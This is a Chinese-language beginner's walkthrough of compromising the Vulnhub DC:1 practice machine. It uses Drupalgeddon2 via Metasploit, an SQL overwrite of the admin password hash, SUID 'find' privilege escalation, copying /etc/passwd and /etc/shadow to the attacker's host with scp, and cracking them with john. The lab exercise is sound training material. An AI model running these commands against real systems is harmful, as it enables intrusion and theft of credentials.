Vulnhub入门实战1-DC:1
DC:1下载链接
(我这里使用的是vm,渗透工具使用的是kali2019)
下载得到的ova文件直接使用vm导入即可。
这里我使用的是桥接模式。
靶机进入登录页面就算开启了。
1.使用arp探索存活主机,找到靶机的ip地址。
找到靶机的ip地址为192.168.199.179
2.使用nmap进行端口扫描(信息收集)。
参数说明:
-sV:版本探测
-p-:扫描全部端口
根据扫描结果开启了22,80,111,可以进行页面访问。
百度了一下drupal,发现drupal是一个php编写的web框架,并且存在漏洞。
3.使用msf进行主机渗透。
搜索drupal的渗透攻击模块。
选取稳定优秀的攻击模块,这里选取exploit/unix/webapp/drupal_drupalgeddon2
。
使用该模块,进行参数设置。
设置完成后进行攻击。
当终端出现Meterpreter session 1 opened
时,表示攻击成功。
4.进入靶机,输入shell。
这里直接找到了flag1,打开看一看有什么提示。
根据提示,我们需要找到web的配置文件,一般在/var/www
中。
首先我们使用python,通过反弹得到一个普通用户终端。
python -c ‘import pty;pty.spawn("/bin/sh")’
进入配置文件的目录下。
找到了配置页面,并同时找到flag2.。
蛮力和字典攻击不是
获得访问权限的唯一方法(您将需要访问权限)。
你可以用这些凭据做什么?
这里可能我们需要进一步提权至root。
配置文件中还给了数据库的账号与密码。
成功进入数据库,先查看一下数据库。
没看到啥有用信息。
于是尝试直接查找users表。
更新数据库时,需要调动加密脚本对密码进行一个加密。于是调用加密脚本,对已知密码进行一个加密。
成功得到password的hash值,之后更新数据库。
update drupaldb.users set pass="$S$D8nl1eGZv53TDkwvCG.36JeWpof7yEstYgznbJAcZOQUAF.KhsYX" where name="admin";
成功修改admin的密码,可以进行登录了。
登录成功后,在find contents
中找到flag3。
点击editor。
特殊的PERMS 将帮助查找密码——但是您需要-exec 该命令来确定如何获取阴影中的内容。
提示我们获取权限查看shadwo中的内容。
5.获取root权限。
查找具有root权限的SUID文件。
find / -user root -perm -4000 -print 2>/dev/null
6.通过find命令获取root权限。
mkdir abc
find abc -exec ‘/bin/sh’
成功提权至root。
7.查看shadow文件。
找到了flag4。
查看/etc/passwd文件。
8.破解flag4密码
连接本地服务器,并将/etc/passwd 和/etc/shadow文件传回,进行破解。
使用scp传回文件进行破解。
scp /etc/passwd root@192.168.199.112:/root/桌面
scp /etc/shadow root@192.168.199.112:/root/桌面
使用unshadow
命令,将两个文件合成为一个。
unshadow passwd shadow > dopass
采用kali自带的john进行破解。
john dopass
破解出flag4
的密码为orange
9.远程登录
通过ssh,远程登录flag4账号。
ssh flag4@192.168.199.179
成功得到第四个flag。
提示我们用同样的方法得到root权限。
同样通过find命令获得root权限。
mkdir abc
find abc -exec ‘/bin/sh’
在root下找到最终的flag。
至此五个flag全部集齐,第一次打靶机,有啥不对的地方请指教。